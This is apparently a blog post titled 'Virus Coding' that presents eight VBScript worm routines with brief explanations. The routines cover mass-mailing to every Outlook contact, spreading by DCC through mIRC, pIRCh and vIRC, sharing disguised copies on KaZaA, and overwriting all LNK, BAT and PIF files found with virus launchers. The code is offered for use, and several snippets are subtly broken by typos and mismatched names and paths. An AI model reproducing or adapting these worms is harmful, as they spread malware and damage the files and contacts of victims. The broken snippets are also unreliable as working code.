VIRUS CODING
Virus Coding
Perfect Internet-Worm via VisualBasic Script
The best 8 VBS technique worm spread via Internet.
High Alert..!!! Users run these viruses on their own risk. These viruses may cause serious harm to your important and highly confidential data/files.
1.) eMail spreading
2.) mIRC spreading
3.) pIRCh spreading
4.) vIRC spreading
5.) KaZaA spreading
6.) LNK dropping
7.) BAT dropping
8.) PIF dropping
*************************************************************************************************
1.) eMail spreading
Code :
Dim x
on error resume next
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For x=1 To a.AddressEntries.Count
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="Subject"
Mail.Body="Body"
Mail.Attachments.Add Wscript.ScriptFullName
Mail.Send
Next
ol.Quit
About this Virus :
The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's quite easy.
*************************************************************************************************
2.) mIRC spreading
Code :
Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }
mirc.Close
About the virus :
First The virus copies itself to C:\mirc\attachment.vbs
Then it changes the mIRC-script.ini file. So every user in the same chatroom gets an infect file.
*************************************************************************************************
3.) pIRCh spreading
Code:
Dim pirch
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\pirch98\events.ini")
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True
pirch.WriteLine "[Levels]");
pirch.WriteLine "Enabled=1");
pirch.WriteLine "Count=6");
pirch.WriteLine "Level1=000-Unknows"
pirch.WriteLine "000-UnknowsEnabled=1"
pirch.WriteLine "Level2=100-Level 100"
pirch.WriteLine "100-Level 100Enabled=1"
pirch.WriteLine "Level3=200-Level 200"
pirch.WriteLine "200-Level 200Enabled=1"
pirch.WriteLine "Level4=300-Level 300"
pirch.WriteLine "300-Level 300Enabled=1"
pirch.WriteLine "Level5=400-Level 400"
pirch.WriteLine "400-Level 400Enabled=1"
pirch.WriteLine "Level6=500-Level 500"
pirch.WriteLine "500-Level 500Enabled=1"
pirch.WriteLine "[000-Unknowns]"
pirch.WriteLine "User1=*!*@*"
pirch.WriteLine "UserCount=1"
pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\attachement.vbs"
pirch.WriteLine "EventCount=1"
pirch.WriteLine "[100-Level 100]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[200-Level 200]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[300-Level 300]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[400-Level 400]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.WriteLine "[500-Level 500]"
pirch.WriteLine "UserCount=0"
pirch.WriteLine "EventCount=0"
pirch.Close
About the virus :
It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98),
then changes the event.ini file, so every user get an infect file.
*************************************************************************************************
4.) vIRC spreading
Code :
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Virc\attachment.vbs", True
set shell=CreateObject("WScript.Shell")
shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\attachment.vbs"
About the virus :
It's a really short code. First you need a copy of the virus, than change a registry key.
That's all...
*************************************************************************************************
5.) KaZaA spreading
Code :
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\Nirvana - You Know You Are Right.vbs", True
set shell=CreateObject("WScript.Shell")
shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa");
About the virus:
You make a copy of the virus in the C:\Kazaa-direction.
Then make a registry-key. Every file in the direction (here it is "C:\kazaa\") other user can download.
I think, you will understand it.
*************************************************************************************************
6.) LNK dropping
Dropping means, that every LNK file opens the virus. Look at the code:
Dim shell, msc, batch, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\vbs.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\vbs.vbs")
msc.WindowStyle=4
msc.Save
set batch=fso.CreateTextFile("C:\lnk.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "for %%a in (*.lnk ..\*.lnk \*.lnk %path%\*.lnk %tmp%\*.lnk %temp%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%a"
batch.Close
shell.Run "C:\lnk.bat"
About the virus :
First the virus makes a copy of itself to C:\vbs.vbs
Then it generates a LNK file, which opens the C:\vbs.vbs-file.
Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.
*************************************************************************************************
7.) BAT dropping
Code :
Dim shell, batcha, batchb, fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batcha=fso.CreateTextFile("C:\bat.bat")
batcha.WriteLine "cls"
batcha.WriteLine "@echo off"
batcha.WriteLine "cscript C:\vbs.vbs"
batcha.Close
set batchb=CreateTextFile("C:\bata.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.bat ..\*.bat \*.bat %path%\*.bat %tmp%\*.bat %temp%\*.bat %windir%\*.bat) do copy C:\bat.bat %%a"
batchb.Close
shell.Run "C:\lnk.bat"
About the virus :
First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy.
Than the virus generates a second batch file, which copies the first one to every batch-files it can find.
*************************************************************************************************
8.) PIF dropping
PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?
Code :
Dim shell, msc, batch, fso, batchb
set fso=CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True
set batch=CreateTextFile("C:\bat.bat")
batch.WriteLine "cls"
batch.WriteLine "@echo off"
batch.WriteLine "cscript C:\vbs.vbs"
batch.Close
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\pif.lnk")
msc.TargetPath=shell.ExpandEnvironment("C:\bat.bat")
msc.WindowStyle=4
msc.Save
set batchb=CreaateTextFile("C:\pif.bat")
batchb.WriteLine "cls"
batchb.WriteLine "@echo off"
batchb.WriteLine "for %%a in (*.pif ..\*.pif \*.pif %path%\*.pif %tmp%\*.pif %temp%\*.pif %windir%\*.pif) do copy C:\pif.pif %%a"
batchb.Close
shell.Run "C:\pif.bat"
About the virus :
First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus.
Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK,
but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF.
Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.
But here you find all content at one place got it
ReplyDelete